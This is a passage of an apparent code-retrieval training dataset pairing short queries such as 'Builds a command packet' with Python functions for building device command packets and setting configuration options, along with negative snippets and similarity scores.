"def __set_mode(self, value):\n # update Nuke\n localization.setMode(str(value.lower()))\n # update panel UI\n logger.debug('disabling pause button: %s', value=='Off')\n # if the localization mode is off diasble pause and force widgets\n self.pauseBtn.setDisabled(value == 'Off')\n self.updateBtn.setDisabled(value == 'Off')\n self.__update_pause_icon()",
"def setSinglePush(self, bool_value):\n self.data_struct['__singlePush'] = bool_value",
"def set_value(self, key, value=None,\n options=None, option_index=None, hidden=None):\n if key not in self:\n self.set_param(key, value,\n options=options,\n option_index=option_index)\n if options is not None:\n self[key]['options'] = options\n if value is None and option_index is None:\n option_index = self[key]['option_index']\n if option_index is not None:\n value = self[key]['options'][option_index]\n self[key]['option_index'] = option_index\n elif value is not None and self[key]['options'] is not None:\n try:\n option_index = self[key]['options'].index(value)\n self[key]['option_index'] = option_index\n except ValueError:\n pass\n elif self[key]['dtype'] == 'bool':\n if str(value).lower().strip() in FALSY:\n value = False\n else:\n value = True\n self[key]['value'] = value\n if hidden is not None:\n self[key]['hidden'] = hidden",
"def SetValue(self, val):\n \n for c in self.choices:\n if val == c.GetLabel():\n c.SetValue(True)\n break",
"def test_set_property_success(self):\r\n self.config.option1 = 9001\r\n self.assertEqual(self.config.values['option1'], 9001)\r\n\r\n self.config.option2 = 'bar'\r\n self.assertEqual(self.config.values['option2'], 'bar')",
"def SetDebugMode(self, debug):\n config = ConfigParser.ConfigParser()\n config.read(self.app_conf)\n config.set(\"Settings\", \"debug_mode\", debug)\n configfile = open(self.app_conf, \"w\")\n config.write(configfile)\n self.debug_mode = misc.to_bool(debug)\n self.wifi.debug = self.debug_mode\n self.wired.debug = self.debug_mode",
"def set_debug_mode(self, value):\n self.debug = value",
"def cbDConfigBit( BoardNum, PortNum, BitNum, Direction ):\n CHK( cbw.cbDConfigBit( BoardNum, PortNum, BitNum, Direction ) )",
"def force_bool(value):\n if isinstance(value, (bool, int)):\n return bool(value)\n\n boolean_states = ConfigParser._boolean_states\n if not value.lower() in boolean_states:\n return None\n\n return boolean_states[value.lower()]",
"def strict_logical(self, value):\n if value is not None:\n if not isinstance(value, bool):\n raise TypeError(\n 'f90nml: error: strict_logical must be a logical value.')\n else:\n self._strict_logical = value",
"def _setForDocument (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forDocument = value\n return value"
] | [
"0.69975346",
"0.66105807",
"0.6431443",
"0.641337",
"0.63824916",
"0.63277537",
"0.6307116",
"0.6288704",
"0.6275827",
"0.6273386",
"0.62682843",
"0.6259129",
"0.6229773",
"0.6222815",
"0.6199952",
"0.615967",
"0.6145829",
"0.61051655",
"0.6090899",
"0.6050174",
"0.6049057",
"0.6039881",
"0.6026596",
"0.5985286",
"0.5979112",
"0.5961897",
"0.59396976",
"0.59132636",
"0.5895424",
"0.58844036",
"0.5839223",
"0.58250225",
"0.5797858",
"0.5758652",
"0.5748404",
"0.5748404",
"0.5733895",
"0.5691167",
"0.56896245",
"0.56892306",
"0.5683847",
"0.567265",
"0.56687325",
"0.5663382",
"0.56547636",
"0.56479955",
"0.56473845",
"0.56085896",
"0.55976725",
"0.559697",
"0.5573783",
"0.55681336",
"0.5555656",
"0.5553306",
"0.5544345",
"0.5544153",
"0.5537421",
"0.5537247",
"0.5526337",
"0.55109507",
"0.5500634",
"0.54976475",
"0.54888934",
"0.5474677",
"0.54617244",
"0.54503065",
"0.544974",
"0.54457915",
"0.5445326",
"0.5440578",
"0.5425748",
"0.5420176",
"0.54112756",
"0.5401528",
"0.5401215",
"0.53993845",
"0.5385274",
"0.5383725",
"0.53801626",
"0.5378208",
"0.5375075",
"0.53659856",
"0.5365154",
"0.536464",
"0.53645027",
"0.53626025",
"0.5359946",
"0.5352904",
"0.53521043",
"0.53517926",
"0.5345224",
"0.5342684",
"0.5341021",
"0.53387207",
"0.5336776",
"0.5335524",
"0.53131545",
"0.5303368",
"0.5302889",
"0.53005004"
] | 0.7702449 | 0 |
Calls base class and sets the options. | def __init__(self):
super(t_var_size_Options, self).__init__()
self.options = {
t_var_size_Options.BOARD_ID : {'value' : '', 'name' : 'board_id' },
t_var_size_Options.CURRENT_STATE : {'value' : '', 'name' : 'state' },
t_var_size_Options.PATTERN_WAVE : {'value' : '', 'name' : 'pat_wav' }
} | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __init__(self, **options):\n self.options = options",
"def set_options(self, options):\n self.options = options",
"def initialize_options(self):",
"def initialize(self, options):",
"def initialize_options(self):\n pass",
"def initialize_options(self):\n pass",
"def initialize_options(self):\n pass",
"def set_options(self, options):\n self.options = options",
"def __init__(self, **user_options):\n self.options = config.default_options.copy()\n self.configure(**user_options)",
"def options(self, options):\n\n self._options = options",
"def options(self, options):\n\n self._options = options",
"def cmdLineOptions(self):\n\t\tself.opts = Options()\n\t\tself.opts.process()\n\t\treturn self",
"def _create_options(self):\n self._OPTIONS = {}",
"def set(cls,options):\n cls.instance = Options(options)",
"def _options(self):\n return",
"def __init__(self, **options):\n self.__dict__.update(\n (k, v) for (k, v) in options.items() if not k.startswith('__'))",
"def __init__(self, **kwargs):\n\n self.opts = {}\n self.opts.update(kwargs)\n self._v_registry = {}",
"def options(self, *args, **kwargs):\n self.request(\"options\", *args, **kwargs)",
"def initialize_options(self):\n self.all = False\n self.coverage = False\n super(test, self).initialize_options()",
"def configure(self, options, conf):",
"def options_set(self):\n\n global OPTIONS\n OPTIONS.append(config.ENABLE(self.threaded))\n OPTIONS.append(config.ENABLE(self.datasaver))\n OPTIONS.append(self.language)",
"def __init__(self):\n self.config = get_config()\n self.options, self.arguments = get_options(self.config)\n if self.get_bool(\"cache\") and self.get_bool(\"cache_search\") \\\n and not self.get_bool(\"longlist\"):\n integrate_search_cache(\n self.config,\n self.get(\"cachedir\"),\n self.get(\"setpath\")\n )\n if not self.arguments:\n if \"id\" in self.options.__dict__ \\\n and self.options.__dict__[\"id\"]:\n self.arguments.append( self.options.__dict__[\"id\"] )\n del( self.options.__dict__[\"id\"] )\n import sys\n message = \"WARNING: the --id option is deprecated and will eventually be removed\\n\"\n sys.stderr.write(message)\n elif \"city\" in self.options.__dict__ \\\n and self.options.__dict__[\"city\"] \\\n and \"st\" in self.options.__dict__ \\\n and self.options.__dict__[\"st\"]:\n self.arguments.append(\n \"^%s city, %s\" % (\n self.options.__dict__[\"city\"],\n self.options.__dict__[\"st\"]\n )\n )\n del( self.options.__dict__[\"city\"] )\n del( self.options.__dict__[\"st\"] )\n import sys\n message = \"WARNING: the --city/--st options are deprecated and will eventually be removed\\n\"\n sys.stderr.write(message)",
"def __init__(self, **kwargs):\n\n self.options = {**self.DEFAULTS, **kwargs}\n self.engine = self.start_matlab_engine()\n self.spm_directory = self.get_spm_directory()",
"def __init__(self, terminal):\r\n super(CustomOptions, self).__init__()\r\n self.longdesc = \"\"\r\n self.terminal = terminal",
"def __init__(self, options=None):\n if options is None:\n options = {}\n # do we need any options for import behavior, such as 'create references', 'use PK', 'resolve DRS', etc?\n defaults = {}\n self.options = {**defaults, **options}",
"def __init__(self, options: DownloaderOptions):\n self.options = options",
"def init_opt(self):\n raise NotImplementedError",
"def init_opt(self):\n raise NotImplementedError",
"def init_opt(self):\n raise NotImplementedError",
"def init_opt(self):\n raise NotImplementedError",
"def initialize_options(self):\n self.base_dir = getcwd()\n self.output_dir = getcwd()\n self.release = None\n self.tag_prefix = 'v'\n self.version = VERSION",
"def main(self, options):\n raise NotImplementedError",
"def __init__(self, values = None):\n TCInit(self)\n if values is not None:\n self.set_opts(values)",
"def setup(self, optparser):\n\t\tpass",
"def _generate_options(self, **kwargs: Any) -> dict:\n raise NotImplementedError",
"def initialize_options(self):\n\n super().initialize_options()\n self.react_interface = None",
"def initialize_options(self):\n self.all = None",
"def options(self, parser):\n pass",
"def set_options(self, **options):\n self.source = options['source'] or settings.MEDIA_ROOT\n self.container = options['container'] or ls.AZURE_DEFAULT_CONTAINER\n self.verbosity = int(options.get('verbosity', 1))\n ignore_patterns = options['ignore_patterns']\n if options['use_default_ignore_patterns']:\n ignore_patterns += ['.*', '*~']\n self.ignore_patterns = list(set(ignore_patterns))\n self.dir = options['dir']",
"def register_options(cls, register):",
"def configure(self, *args, **kwargs):\n raise NotImplementedError()",
"def configure(self, *args, **kwargs):\n raise NotImplementedError()",
"def configure(self, *args, **kwargs):\n raise NotImplementedError()",
"def initialize_options(self):\n self.proto_path = \"oef-core-protocol\"",
"def setclsoptions(cls, tmpcls, session):\n if len(optionsdict[tmpcls]['OPTIONS']) == 0:\n ret = tmpcls().options(session)\n if not utils.is_failed_resp(ret):\n optionsdict[tmpcls]['OPTIONS'] = ret",
"def configure(self, options, conf):\n pass",
"def finalize_options(self):",
"def finalize_options(self):",
"def __init__(self, **kwargs):\n # Call superclass\n super().__init__(**kwargs)",
"def options(self, parser, env):\n pass",
"def setOptions(self):\n self.parser.add_option(\"--jobid\",\n dest=\"jobid\",\n default=None,\n type=\"int\",\n help=\"Optional id of the job you want to execute locally\")\n\n self.parser.add_option(\"--enableStageout\",\n dest=\"enableStageout\",\n default=False,\n action=\"store_true\",\n help=\"After the job runs copy the output file on the storage destination\")\n\n self.parser.add_option(\"--destdir\",\n dest=\"destdir\",\n default=None)",
"def setup(self, options, results):",
"def common_options(self, common_options):\n self._common_options = common_options",
"def __init__(self):\n self._opts = {} # dict of dicts of (opt:, override:, default:)\n self._groups = {}\n self._deprecated_opts = {}\n\n self._args = None\n\n self._oparser = None\n self._namespace = None\n self._mutable_ns = None\n self._mutate_hooks = set([])\n self.__cache = {}\n self.__drivers_cache = {}\n self._config_opts = []\n self._cli_opts = collections.deque()\n self._validate_default_values = False\n self._sources = []\n self._ext_mgr = None\n # Though the env_driver is a Source, we load it by default.\n self._use_env = True\n self._env_driver = _environment.EnvironmentConfigurationSource()\n\n self.register_opt(self._config_source_opt)",
"def _CommonOptions(self, p):\n super()._CommonOptions(p, opt_v=False)",
"def add_base_options(self):\n for option in self.base_options:\n self.add_option(*option.get_option_names(), **option.kwargs)",
"def ParseOptions(cls, options, config_object):",
"def __init__(self, config_file=None):\n\t\tself.options = {}\n\n\t\tif config_file:\n\t\t\tself.set_file(config_file)",
"def __init__(self, base, **kwargs):\n self.base = base",
"def __init__( self, **kwargs ):\n self.__dict__.update( kwargs )",
"def configure(self):\n warnings.warn(\"No options to configure for \" + self.__class__.__name__)",
"def _init(self, options):\n self._initRuntime(options)\n self._loadConfig() # needs runtime\n self._initGeneral() # needs _config\n self._initGroups() # needs _config and general",
"def __init__(self, **kwargs):\n self.__dict__.update(kwargs)",
"def __init__(self, **kwargs):\n self.__dict__.update(kwargs)",
"def set_options(*args, **kwargs):\n for option in kwargs:\n if option not in BasePlan.options:\n raise BadOption('%s is not a valid, must be a combination '\n 'of %s' % (option, ','.join(BasePlan.options.keys(),)))\n BasePlan.options.update(kwargs)",
"def handle(self, options, global_options, *args):\r\n raise NotImplementedError()",
"def prepare(self, **options):\r\n raise NotImplementedError",
"def __new__(meta, name, bases, class_attributes):\r\n class_attributes, options = meta.find_options(class_attributes)\r\n class_attributes['options'] = options\r\n cls = super(ConfigBase, meta).__new__(meta, name, bases, class_attributes)\r\n for opt_name, option in options.iteritems():\r\n opt_get = functools.partial(cls.get_value, name=opt_name, option=option, presentation=True)\r\n opt_set = functools.partial(cls._set_value, name=opt_name, option=option)\r\n setattr(cls, opt_name, property(opt_get, opt_set))\r\n return cls",
"def setOptions(self, options):\n assert isinstance(options, list);",
"def __init__(self, opt):\n # init will store opt into the object.\n super().__init__(opt)\n\n # variable is tripped once a model is requested to save.\n self.save_trip = False",
"def __init__(self):\n self._create_options()\n self._create_sections()",
"def add_options(cls, parser):\n pass",
"def configure(self, **options):\r\n if self._wrapped != None:\r\n raise RuntimeError('Settings already configured.')\r\n holder = BaseSettings()\r\n for name, value in options.items():\r\n setattr(holder, name, value)\r\n self._wrapped = holder",
"def _default_options(cls) -> Options:\n options = super()._default_options()\n\n options.curve_fitter = multi_curve_fit\n options.data_processor = None\n options.normalization = False\n options.x_key = \"xval\"\n options.plot = True\n options.axis = None\n options.xlabel = None\n options.ylabel = None\n options.xlim = None\n options.ylim = None\n options.xval_unit = None\n options.yval_unit = None\n options.result_parameters = None\n options.return_data_points = False\n options.curve_plotter = \"mpl_single_canvas\"\n options.style = PlotterStyle()\n\n # automatically populate initial guess and boundary\n fit_params = cls._fit_params()\n options.p0 = {par_name: None for par_name in fit_params}\n options.bounds = {par_name: None for par_name in fit_params}\n\n return options",
"def __init__(self, **options):\n\n super().__init__()\n\n self._enabled = options.get('cors_enabled')\n self._always_send = options.get('cors_always_send')\n self._allowed_origins = options.get('cors_allowed_origins')\n self._exposed_headers = options.get('cors_exposed_headers')\n self._allowed_headers = options.get('cors_allowed_headers')\n self._allow_credentials = options.get('cors_allow_credentials')\n self._max_age = options.get('cors_max_age')",
"def __init__(self, prompt, options):\n self.prompt = prompt\n self.options = options",
"def __init__(self):\n self.__parser=OptionParser(option_class=MyOption)\n self.__source=''\n self.__dest=''\n self.__all=False\n self.__inv=False\n self.__tree=''\n self.__authpath=''\n self.__verbose=False",
"def __init__(self, **kwargs):\n super().__init__(kwargs)",
"def __init__(self, **kwargs):\n super().__init__(kwargs)",
"def __init__(self, options):\n\n StagerBase.__init__(self, options, None)\n self._build_revision = self._chromium_revision",
"def setoptions(cls, session):\n newlist = list(clslist)\n list(map(lambda x: cls.setclsoptions(x, session), newlist))",
"def _default_options(cls):\n default_options = super()._default_options()\n default_options.data_processor = dp.DataProcessor(\n input_key=\"counts\",\n data_actions=[dp.Probability(\"1\"), dp.BasisExpectationValue()],\n )\n default_options.plotter.set_figure_options(\n xlabel=\"Flat top width\",\n ylabel=\"Pauli expectation values\",\n xval_unit=\"s\",\n ylim=(-1, 1),\n )\n default_options.data_subfit_map = {\n \"x\": {\"meas_basis\": \"x\"},\n \"y\": {\"meas_basis\": \"y\"},\n \"z\": {\"meas_basis\": \"z\"},\n }\n\n return default_options",
"def setupParserOptions(self):\n\t\tapDisplay.printError(\"you did not create a 'setupParserOptions' function in your script\")\n\t\traise NotImplementedError()",
"def __init__(self, cmd):\n # Build command + options \n self.cmd = cmd \n setattr(self, 'command', \"%s\" % (cmd))",
"def configure(self, *args):\n raise NotImplementedError(self, \"configure\")",
"def __post_init__(self, pluginOptions: Optional[dict[str, RuntimeOptionValue]]) -> None:\n if pluginOptions:\n existingBaseOptions = sorted(\n optionName\n for optionName in pluginOptions.keys()\n if hasattr(self, optionName)\n )\n if existingBaseOptions:\n raise RuntimeOptionsException(_('Provided plugin options already exist as base options {}').format(existingBaseOptions))\n for optionName, optionValue in pluginOptions.items():\n setattr(self, optionName, optionValue)\n if (self.entrypointFile is None and\n not self.proxy and\n not self.plugins and\n not pluginOptions and\n not self.webserver):\n raise RuntimeOptionsException(_('Incorrect arguments'))\n if self.webserver and not hasWebServer():\n raise RuntimeOptionsException(_(\"Webserver option requires webserver module\"))\n if self.webserver and any((\n self.entrypointFile, self.importFiles, self.diffFile, self.versReportFile,\n self.factsFile, self.factListCols, self.factTableFile, self.factTableCols,\n self.relationshipCols, self.conceptsFile, self.preFile, self.tableFile, self.calFile,\n self.dimFile, self.anchFile, self.formulaeFile, self.viewArcrole, self.viewFile,\n self.roleTypesFile, self.arcroleTypesFile\n )):\n raise RuntimeOptionsException(_('Incorrect arguments with webserver'))",
"def __init__(self, options=None):\n super().__init__()\n self.logger.debug(\"Creating %s arch\", self.name)\n self.option_settings = {o: False for o in self.option_names}\n if options:\n assert isinstance(options, tuple)\n for option_name in options:\n assert option_name in self.option_names\n self.option_settings[option_name] = True\n self.asm_printer = AsmPrinter()",
"def setOptions(self):\n self.parser.add_option( \"--outputdir\",\n dest = \"outdir\",\n default = None,\n help = \"Directory to write JSON summary to.\" )\n\n self.parser.add_option( \"--dbs\",\n dest = \"usedbs\",\n default = 'no',\n help = \"Use information in DBS to build the input lumi lists and the output lumi lists.\"+\\\n \" Allowed values are yes/no. Default is no.\" )",
"def __init__(self, *args, **kwargs):\n super(self.__class__, self).__init__(*args, **kwargs)",
"def __validate_options__(cls, options):\n pass",
"def options(self):\n return self.__options",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)",
"def __init__(self, ignored_args = [], **common_options):\n self.ignored_args = ignored_args\n self.common_options = self._fix_argparse_dicts(common_options)",
"def __init__(self, options=None):\n if options is None:\n options = {}\n self.verbosity = options.get(\"verbosity\", 0)\n self.format = options.get(\"format\", \"grid\")\n self.server = options.get(\"server\", None)\n\n self.charset_map = None\n\n if self.server:\n self.charset_map = self.server.exec_query(_CHARSET_QUERY)",
"def __init__(self, options):\n self.options = options\n self.model = Q_Trader(options)\n self.datasmith = make_data.MakeData(options)\n self.reset()",
"def __init__(self, optv):\n self.__p4optv = optv\n # Treat '-g' like '-G' except the marshal'ed Python dicts\n # will be unmarshal'ed.\n if '-g' in self.__p4optv:\n self.__p4optv[self.__p4optv.index('-g')] = '-G'\n self.__unmarshal = 1\n else:\n self.__unmarshal = 0\n # Drop '-s'. 'p4' implements this on the client side and so\n # should 'px' (XXX though it does not yet), so the option should\n # not be passed to the server.\n if '-s' in self.__p4optv:\n self.__p4optv.remove('-s')\n log.warn(\"dropping '-s' option, px cannot yet handle it\")\n _ListCmd.__init__(self)",
"def add_options(self, parser):\n pass"
] | [
"0.77025074",
"0.7662632",
"0.7593163",
"0.7496479",
"0.7381808",
"0.7353797",
"0.7353797",
"0.71979177",
"0.71634424",
"0.7015553",
"0.7015553",
"0.7015013",
"0.6925202",
"0.68997306",
"0.683711",
"0.6774097",
"0.6744283",
"0.6743406",
"0.6712053",
"0.6625223",
"0.65894604",
"0.65881455",
"0.65850544",
"0.6566034",
"0.65433615",
"0.6529545",
"0.65226483",
"0.65226483",
"0.65226483",
"0.65226483",
"0.65171134",
"0.6501442",
"0.64913356",
"0.64792895",
"0.6477148",
"0.64769965",
"0.6451197",
"0.643889",
"0.6410815",
"0.63811785",
"0.63477314",
"0.63477314",
"0.63477314",
"0.63464993",
"0.6341114",
"0.6332209",
"0.63185745",
"0.63185745",
"0.6313834",
"0.62849814",
"0.6255908",
"0.623813",
"0.62337077",
"0.6223183",
"0.62153465",
"0.62133753",
"0.619589",
"0.61945647",
"0.6192764",
"0.61848193",
"0.6184323",
"0.61825705",
"0.6177179",
"0.6177179",
"0.6171666",
"0.6168999",
"0.61675185",
"0.6165713",
"0.61639273",
"0.6131982",
"0.6124039",
"0.61212796",
"0.61210597",
"0.6118545",
"0.6099317",
"0.6085287",
"0.6084321",
"0.6081508",
"0.6081508",
"0.60777503",
"0.60763526",
"0.6067949",
"0.6062917",
"0.60500556",
"0.6046491",
"0.6034073",
"0.60250485",
"0.6016009",
"0.6014855",
"0.6005906",
"0.5999214",
"0.59984165",
"0.59984165",
"0.59984165",
"0.59984165",
"0.599342",
"0.5981618",
"0.5970565",
"0.59662884",
"0.5965931"
] | 0.6098035 | 75 |
Builds a command packet | def build_command_packet(self, command):
packet = bytearray()
# All option fields are 0
packet.append(0)
packet.append(0)
packet.append(0)
packet.append(command)
return packet | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _build_command(self, command_name, hardware_address = '', comp_var_dict = None):\n # Start command adn set name\n command = \"<Command><Name>{command_name}</Name>\".format(command_name=command_name)\n\n if hardware_address:\n command += \"<DeviceDetails><HardwareAddress>{hardware_address}</HardwareAddress></DeviceDetails>\".format(hardware_address=hardware_address)\n\n if comp_var_dict is not None:\n comp_keys = comp_var_dict.keys()\n if len(comp_keys) > 0:\n for comp_key in comp_keys:\n # Build requested variable list\n command += \"<Components><Component><Name>{comp_key}</Name><Variables>\".format(comp_key=comp_key)\n variables = comp_var_dict[comp_key]\n for var in variables:\n command += \"<Variable><Name>{var}</Name></Variable>\".format(var=var)\n command += \"</Variables></Component></Components>\"\n else:\n # Request all variables from all components\n command += \"<Components><All>Y</All></Components>\"\n\n # Close command\n command += \"</Command>\"\n \n return command",
"def _build_command(self, cmd, unit):\n return '#' + unit + cmd + NEWLINE",
"def _build_send_optode_command(self, cmd, command):\n return \"%s=%s%s\" % (cmd, command, self._newline)",
"def _build_setup_command(self, cmd, unit):\n # use defaults - in the future, may consider making some of these parameters\n # byte 0\n channel_address = unit\n # byte 1\n line_feed = self._param_dict.format(Parameter.LINEFEED)\n parity_type = self._param_dict.format(Parameter.PARITY_TYPE)\n parity_enable = self._param_dict.format(Parameter.PARITY_ENABLE)\n extended_addressing = self._param_dict.format(Parameter.EXTENDED_ADDRESSING)\n baud_rate = self._param_dict.format(Parameter.BAUD_RATE)\n baud_rate = getattr(BaudRate, 'BAUD_%d' % baud_rate, BaudRate.BAUD_9600)\n # byte 2\n alarm_enable = self._param_dict.format(Parameter.ALARM_ENABLE)\n low_alarm_latch = self._param_dict.format(Parameter.LOW_ALARM_LATCH)\n high_alarm_latch = self._param_dict.format(Parameter.HIGH_ALARM_LATCH)\n rtd_wire = self._param_dict.format(Parameter.RTD_4_WIRE)\n temp_units = self._param_dict.format(Parameter.TEMP_UNITS)\n echo = self._param_dict.format(Parameter.ECHO)\n delay_units = self._param_dict.format(Parameter.COMMUNICATION_DELAY)\n # byte 3\n precision = self._param_dict.format(Parameter.PRECISION)\n precision = getattr(UnitPrecision, 'DIGITS_%d' % precision, UnitPrecision.DIGITS_6)\n large_signal_filter_constant = self._param_dict.format(Parameter.LARGE_SIGNAL_FILTER_C)\n large_signal_filter_constant = filter_enum(large_signal_filter_constant)\n small_signal_filter_constant = self._param_dict.format(Parameter.SMALL_SIGNAL_FILTER_C)\n small_signal_filter_constant = filter_enum(small_signal_filter_constant)\n\n # # Factory default: 0x31070182\n # # Lab default: 0x310214C2\n\n byte_0 = int(channel_address.encode(\"hex\"), 16)\n log.debug('byte 0: %s', byte_0)\n byte_1 = \\\n (line_feed << 7) + \\\n (parity_type << 6) + \\\n (parity_enable << 5) + \\\n (extended_addressing << 4) + \\\n baud_rate\n log.debug('byte 1: %s', byte_1)\n byte_2 = \\\n (alarm_enable << 7) + \\\n (low_alarm_latch << 6) + \\\n (high_alarm_latch << 5) + \\\n (rtd_wire << 4) + \\\n (temp_units << 3) + \\\n (echo << 2) + \\\n delay_units\n log.debug('byte 2: %s', byte_2)\n byte_3 = \\\n (precision << 6) + \\\n (large_signal_filter_constant << 3) + \\\n small_signal_filter_constant\n log.debug('byte 3: %s', byte_3)\n\n setup_command = '#%sSU%02x%02x%02x%02x' % (unit[0], byte_0, byte_1, byte_2, byte_3) + NEWLINE\n log.debug('default setup command (%r) for unit %02x (%s)' % (setup_command, byte_0, unit[0]))\n return setup_command",
"def buildCmd( tcmpCmd, cmd, target, sequence, fieldList):\n cmdList = [tcmpCmd, cmd, target, sequence, fieldList]\n\n return \"<{cmd}>\".format(cmd=\":\".join(cmdList))",
"def init_cmd( cmd_num=0):\n if cmd_num in [12,16,2,4,9,10,13,17,18,24]:\n log.warning(\"Command %d is not supported on SDIO, sending anyway but what are you doing?!\" %cmd_num)\n\n cmd = BinaryValue(bits=48,bigEndian=False)\n cmd[47] = 0 # Start value\n cmd[46] = 1 # Direction , 1 = towards device, 0 = towards host\n cmd[45:40] = BinaryValue(value=cmd_num, bits=6, bigEndian=False).integer\n cmd[0] = 1 # Stop bit\n return cmd",
"def build_message(cmd, data):\r\n\tif len(cmd) > CMD_FIELD_LENGTH or len(data) > MAX_DATA_LENGTH:\r\n\t\treturn None\r\n\tfull_cmd = cmd + \" \"*(CMD_FIELD_LENGTH-len(cmd))\r\n\tdata_len = str(len(data))\r\n\tfull_data_len = \"0\"*(LENGTH_FIELD_LENGTH-len(data_len))+data_len\r\n\tfull_msg = DELIMITER.join([full_cmd, full_data_len, data])\r\n\treturn full_msg",
"def _pack(self):\n\n opt = 0\n if self.notify:\n opt = opt | CQC_OPT_NOTIFY\n if self.block:\n opt = opt | CQC_OPT_BLOCK\n if self.action:\n opt = opt | CQC_OPT_ACTION\n\n cmdH = struct.pack(self.PACKAGING_FORMAT, self.qubit_id, self.instr, opt)\n return cmdH",
"def build_command_depricated(device_dict, command_tuple):\n command = \" \" # The final command which should be send in the end\n return_list = [] # Is list of commands which can be returned if need be\n only_command = False # Flag if only a command was passed, important if such a command doesnt need syntax!\n\n if (\n type(command_tuple) == type(u\"Unicode\")\n or type(command_tuple) == str\n or type(command_tuple) == float\n or type(command_tuple) == int\n ):\n command_tuple = (str(command_tuple), \"\") # so only tuple are now prevelent\n only_command = True\n elif type(command_tuple[1]) == list:\n command_tuple = (\n command_tuple[0],\n [str(x) for x in command_tuple[1]],\n ) # so no unicode is present\n\n # Preparations\n # look for a syntax (paranteses and so on)\n if \"syntax\" in device_dict:\n syntax = str(device_dict[\"syntax\"])\n syntax = syntax.split(\"###\")\n if not syntax[0]:\n syntax = [\"\", \"\"] # Most devices have no paranteses or whatsoever\n else:\n syntax = [\"\", \"\"] # Most devices have no paranteses or whatsoever\n\n # Looks if a separator is needed to sepatare mulitple orders\n if \"separator\" in device_dict:\n sepa = str(device_dict[\"separator\"])\n else:\n sepa = \" \" # This should be the standard for most devices\n\n if command_tuple[0] in device_dict:\n # here all the magic happens\n # First look if the order is swichted or not (command value, or value command)\n\n # Check if multiple commands so list or so\n if type(device_dict[command_tuple[0]]) == str or type(\n device_dict[command_tuple[0]]\n ) == type(u\"Unicode\"):\n command_list = [device_dict[command_tuple[0]]]\n else:\n command_list = device_dict[command_tuple[0]]\n\n for command_item in command_list:\n command_item = str(command_item)\n command = \"\"\n\n # Value -> Command\n if int(device_dict.get(\"command_order\", 1)) == -1:\n # Now look if a csv structure is necessary for the command to work\n start_ind = command_tuple[0].find(\n \"_\"\n ) # finds the index of the command, to search for\n if (\n \"CSV\" + command_tuple[0][start_ind:] in device_dict\n ): # looks if an actual csv-command is there\n # Todo: test CSV command\n csv_commands = device_dict[\n \"CSV\" + str(command_tuple[0])[start_ind:]\n ]\n csv_commands = (\n csv_commands.strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n ) # get rid of some caracters which should not be there\n csv_commands = csv_commands.split(\n \",\"\n ) # now split it for easy access\n\n # Make sure you always got a list of the next commandblock will fail\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n value_list = command_tuple[1]\n elif type(command_tuple[1]) == str or type(command_tuple) == type(\n u\"Unicode\"\n ):\n value_list = (\n command_tuple[1]\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n .replace(\" \", \"\")\n )\n value_list = value_list.split(\",\")\n\n csv_list = (\n \",\".join(map(str, value_list))\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n )\n csv_list = csv_list.split(\",\")\n\n for i, com in enumerate(csv_list):\n # here the input will be checked if enough parameters are passed for this command.\n # If not a 0 will be entered and a warning will be printed\n command += str(csv_list[i]).strip() + sepa\n\n if i + 1 < len(csv_commands) and len(csv_commands) > 1:\n for j in range(\n i + 1, len(csv_commands)\n ): # Fill the rest of the missing paramters\n l.error(\n \"Warning: Not enough parameters passed for function: \"\n + str(command_item)\n + \" the command must consist of \"\n + str(csv_commands)\n + \" '\"\n + str(csv_commands[j])\n + \"' is missing! Inserted 0 instead.\"\n )\n command += \"0\" + sepa\n\n command = command.strip(\" \").strip(\",\") # to get rid of last comma\n\n else: # So if no CSV was found for this command, just build the command with the value and the separator\n # First check if a List is present or so\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n string = \"\"\n for item in command_tuple[1]:\n command = syntax[1] + str(item) + \" \" + command_item\n command = command.strip()\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command)\n return return_list\n\n else: # If only a command was passed\n string = str(command_tuple[1])\n command += syntax[1] + str(string).strip()\n\n if (\n only_command\n and device_dict.get(\"no_syntax_with_single_commmand\", False)\n and syntax[1] != \" \"\n and syntax[0] != \" \"\n ):\n command = command.replace(syntax[1], \"\")\n command = command.replace(syntax[0], \"\")\n\n # command += \" \" + str(device_dict[str(command_item)]).strip() + syntax[0] # adds the order to the command\n command += (\n \" \" + str(command_item).strip() + syntax[0]\n ) # adds the order to the command\n # Add a command terminator if one is needed and the last part of the syntax\n command = command.strip()\n command += device_dict.get(\"execution_terminator\", \"\")\n # command += syntax[0] # adds the order to the command\n return_list.append(command)\n\n # Command -> Value\n else:\n command += (\n str(command_item).strip() + \" \" + syntax[0]\n ) # adds the order to the command\n\n # Now look if a csv structure is necessary for the command to work\n start_ind = command_tuple[0].find(\n \"_\"\n ) # finds the index of the command, to search for\n if (\n \"CSV\" + command_tuple[0][start_ind:] in device_dict\n ): # looks if an actual csv-command is there\n # Todo: test CSV command\n csv_commands = device_dict[\n \"CSV\" + str(command_tuple[0])[start_ind:]\n ]\n csv_commands = (\n csv_commands.strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n ) # get rid of some caracters which should not be there\n csv_commands = csv_commands.split(\n \",\"\n ) # now split it for easy access\n\n # Make sure you always got a list of the next commandblock will fail\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n value_list = command_tuple[1]\n elif type(command_tuple[1]) == str or type(command_tuple) == type(\n u\"Unicode\"\n ):\n value_list = (\n command_tuple[1]\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n .replace(\" 